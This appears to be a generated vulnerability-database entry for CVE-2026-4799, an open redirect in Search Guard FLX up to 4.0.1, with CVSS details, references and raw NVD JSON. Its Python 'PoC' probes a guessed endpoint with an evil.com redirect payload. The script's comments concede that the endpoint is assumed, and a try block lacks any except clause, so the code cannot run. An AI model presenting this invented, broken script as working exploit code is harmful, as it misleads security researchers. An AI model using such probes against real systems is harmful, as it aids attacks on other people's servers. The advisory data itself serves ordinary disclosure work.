CVE-2026-4799

Description

In Search Guard FLX up to version 4.0.1, it is possible to use specially crafted requests to redirect the user to an untrusted URL.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:search-guard:flx:*:*:*:*:*:*:*:* - VULNERABLE

Search Guard FLX <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-4799: Search Guard FLX Open Redirect
# This script demonstrates the vulnerability by checking for a redirect to an external domain.

import requests

def check_open_redirect(target_host):
    # The vulnerable endpoint and parameter might vary; this is a generic example.
    # Based on the description, we craft a URL that attempts to redirect externally.
    malicious_url = "http://evil.com"
    
    # Example payload structure (actual endpoint needs to be verified against specific version)
    # Assuming a common vulnerable parameter pattern like 'url' or 'redirect'
    target_url = f"{target_host}/_searchguard/redirect?next={malicious_url}"
    
    try:
        # Send request, do not follow redirects to inspect the response header
        response = requests.get(target_url, allow_redirects=False, timeout=5)
        
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location')
            if location and "evil.com" in location:
                print(f"[+] Vulnerability Confirmed! Redirecting to: {location}")
                return True
        
        print(f"[-] Not vulnerable or payload incorrect. Status: {response.status_code}")
        return False

if __name__ == "__main__":
    target = "http://localhost:9200" # Replace with actual target
    check_open_redirect(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4799
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4799
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4799/
[4] VulDB https://vuldb.com/cve/CVE-2026-4799
[5] https://docs.search-guard.com/latest/changelog-searchguard-flx-4_1_0
[6] https://search-guard.com/cve-advisory/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4799", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:21.137", "lastModified": "2026-04-03T15:20:31.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Search Guard FLX up to version 4.0.1, it is possible to use specially crafted requests to redirect the user to an untrusted URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:search-guard:flx:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.0", "matchCriteriaId": "4C65AC7E-E982-4294-A251-29C6906A2937"}]}]}], "references": [{"url": "https://docs.search-guard.com/latest/changelog-searchguard-flx-4_1_0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://search-guard.com/cve-advisory/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}